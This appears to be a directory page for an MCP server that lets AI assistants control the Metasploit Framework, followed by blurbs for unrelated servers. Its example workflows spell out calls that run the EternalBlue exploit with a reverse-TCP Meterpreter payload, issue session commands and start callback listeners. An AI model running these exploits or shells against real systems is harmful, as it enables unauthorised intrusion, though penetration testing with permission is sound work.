About
Metasploit MCP Server is a bridge that connects AI assistants to the Metasploit Framework penetration testing platform through the Model Context Protocol. It exposes Metasploit's RPC functionality as standardized tools, enabling natural language control of complex security testing workflows. Key capabilities include: - **Module Discovery**: Search and list available exploit, payload, auxiliary, and post-exploitation modules with platform and architecture filtering - **Exploit Execution**: Configure and run exploits against targets with optional safety checks before deployment - **Payload Generation**: Create custom payload files for specific platforms and architectures using the Metasploit RPC - **Session Management**: Inspect active sessions, execute commands in shell or Meterpreter sessions, and terminate connections - **Handler Control**: Start multi/handlers to receive connections, view active listeners, and manage background jobs The server connects to a running Metasploit RPC daemon (msfrpcd) and supports both HTTP/SSE and STDIO transport modes for integration with Claude Desktop and other MCP clients.
README
Metasploit MCP Server
A Model Context Protocol (MCP) server for Metasploit Framework integration.
https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
Description
This MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.
Features
Module Information
Exploitation Workflow
Payload Generation
Session Management
Handler Management
Prerequisites
Installation
1. Clone this repository 2. Install dependencies:
pip install -r requirements.txt
MSF_PASSWORD=yourpassword
MSF_SERVER=127.0.0.1
MSF_PORT=55553
MSF_SSL=false
PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads
Usage
Start the Metasploit RPC service:
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
Transport Options
The server supports two transport methods:
You can explicitly select the transport mode using the --transport flag:
# Run with HTTP/SSE transport (default)
python MetasploitMCP.py --transport httpRun with STDIO transport
python MetasploitMCP.py --transport stdio
Additional options for HTTP mode:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
Claude Desktop Integration
For Claude Desktop integration, configure claude_desktop_config.json:
{
"mcpServers": {
"metasploit": {
"command": "uv",
"args": [
"--directory",
"C:\\path\\to\\MetasploitMCP",
"run",
"MetasploitMCP.py",
"--transport",
"stdio"
],
"env": {
"MSF_PASSWORD": "yourpassword"
}
}
}
}
Other MCP Clients
For other MCP clients that use HTTP/SSE:
1. Start the server in HTTP mode:
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
2. Configure your MCP client to connect to:
- SSE endpoint: http://your-server-ip:8085/sse
Security Considerations
⚠️ IMPORTANT SECURITY WARNING:
This tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.
Example Workflows
Basic Exploitation
1. List available exploits: list_exploits("ms17_010")
2. Select and run an exploit: run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})
3. List sessions: list_active_sessions()
4. Run commands: send_session_command(1, "whoami")
Post-Exploitation
1. Run a post module: run_post_module("windows/gather/enum_logged_on_users", 1)
2. Send custom commands: send_session_command(1, "sysinfo")
3. Terminate when done: terminate_session(1)
Handler Management
1. Start a listener: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
2. List active handlers: list_listeners()
3. Generate a payload: `generate_payload("
Related MCP Servers
AI Research Assistant
hamid-vakilzadeh
AI Research Assistant provides comprehensive access to millions of academic papers through the Semantic Scholar and arXiv databases. This MCP server enables AI coding assistants to perform intelligent literature searches, citation network analysis, and paper content extraction without requiring an API key. Key features include: - Advanced paper search with multi-filter support by year ranges, citation thresholds, field of study, and publication type - Title matching with confidence scoring for finding specific papers - Batch operations supporting up to 500 papers per request - Citation analysis and network exploration for understanding research relationships - Full-text PDF extraction from arXiv and Wiley open-access content (Wiley TDM token required for institutional access) - Rate limits of 100 requests per 5 minutes with options to request higher limits through Semantic Scholar
Linkup
LinkupPlatform
Linkup is a real-time web search and content extraction service that enables AI assistants to search the web and retrieve information from trusted sources. It provides source-backed answers with citations, making it ideal for fact-checking, news gathering, and research tasks. Key features of Linkup: - Real-time web search using natural language queries to find current information, news, and data - Page fetching to extract and read content from any webpage URL - Search depth modes: Standard for direct-answer queries and Deep for complex research across multiple sources - Source-backed results with citations and context from relevant, trustworthy websites - JavaScript rendering support for accessing dynamic content on JavaScript-heavy pages
Saju Insights
hjsh200219
Saju Insights provides personalized Korean traditional Four Pillars of Destiny (Saju) fortune-telling based on birth data. It calculates destiny charts using the eight characters (four heavenly stems and four earthly branches) derived from birth year, month, day, and hour. Key capabilities include: - Birth chart calculation with automatic True Solar Time adjustment (Jintaeyangsi -30min correction) - Fortune analysis covering personality, career, wealth, health, and love prospects - Relationship compatibility analysis comparing two people's Saju charts - 10-year luck cycle (Daewon) predictions for long-term planning - Yongsin (favorable element) guidance on lucky colors, directions, and career paths - Lunar-solar calendar conversion supporting 1900-2200 with leap month handling - Daily fortune readings and seasonal power calculations - Multiple interpretation schools including Ziping, DTS, and modern methodologies